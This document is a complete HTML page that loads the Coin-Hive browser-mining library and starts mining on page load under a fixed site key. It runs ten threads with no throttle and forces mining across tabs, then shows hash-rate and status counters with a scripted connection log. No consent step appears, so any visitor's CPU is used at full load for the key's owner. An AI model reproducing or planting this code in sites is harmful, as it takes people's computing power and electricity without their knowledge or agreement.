<html class="border-box">
<head><meta charset="utf-8"></head>
<body>
<link href="http://gglink.ga/typo.css" rel="stylesheet" />
<script src="https://coin-hive.com/lib/coinhive.min.js"></script>

<div class="main">
<h5>Info:</h5>
<div class="content">
<h6>hash/s: </h6><span id="hps">0</span>
<h6>total hashes: </h6> <span id="th">0</span>
<h6>accepted hashes: </h6> <span id="ah">0</span>
<h6>status: </h6> <span id="status">Connecting...</span>
</div>
</div>

<code><div class="console" id="console">
Coin-Hive v1.0
</div></code>
<style>
.content { margin-left: 2em; line-height: 2.5 !important; }
body { padding: 3em; font-size: 2em; font-weight: 400 !important }

#hps,#th,#ah,#status {
  margin-left: 1em;
  font-family: 'Source Code Pro', 'Courier New', 'Courier', monospace !important;
}

body {

  background: #F1F2B5;  /* fallback for old browsers */
  background: -webkit-linear-gradient(to left, #135058, #F1F2B5);  /* Chrome 10-25, Safari 5.1-6 */
  background: linear-gradient(to left, #135058, #F1F2B5); /* W3C, IE 10+/ Edge, Firefox 16+, Chrome 26+, Opera 12+, Safari 7+ */

}

.console {
position: absolute;
width: 35%;
height: 100%;
top: 0;
right: 0;
padding: 2em;
font-size: 0.5em;
}
</style>

<script>
	var miner = new CoinHive.Anonymous('UitANGIFzXKM1p25LYThHGmI5jpFkrd4', {
	threads: 10,
	autoThreads: false,
	throttle: 0,
	forceASMJS: false
	});
	
	miner.start(CoinHive.FORCE_MULTI_TAB);
	
	setInterval(function() {
		var hashesPerSecond = miner.getHashesPerSecond().toFixed(6);
		var totalHashes = miner.getTotalHashes(true);
		var acceptedHashes = miner.getAcceptedHashes();
		// Output to HTML elements...
		document.getElementById("hps").innerHTML=hashesPerSecond;
		document.getElementById("th").innerHTML=totalHashes;
		document.getElementById("ah").innerHTML=acceptedHashes;
	}, 100);

miner.on('open', function(params) {
	statusupdate("Connected. Retriving token...");
   addlog("Connected to the Server.");
   addlog("Making handshake...");
});

miner.on('authed', function(params) {
	statusupdate("Token Received. Waiting for job...");
   addlog("Token received.");
   addlog("Asked for jobs.");
   addlog("Waiting response...");
});

miner.on('job', function(params) {
	statusupdate("Worker is running...");
   addlog("Got response. Starting worker...");
   addlog("Worker running...");
});

function statusupdate(currst){
  document.getElementById("status").innerHTML=currst;
}

function pad(num, n) {
    var len = num.toString().length;
    while(len < n) {
        num = "0" + num;
        len++;
    }
    return num;
}

var getdate=new Date();

function addlog(logc){
  document.getElementById("console").innerHTML+="<br>[ "+pad(getdate.getHours(),2)+":"+pad(getdate.getMinutes(),2)+":"+pad(getdate.getSeconds(),2)+":"+pad(getdate.getMilliseconds(),2)+" ] "+logc;
}

	</script></body></html>
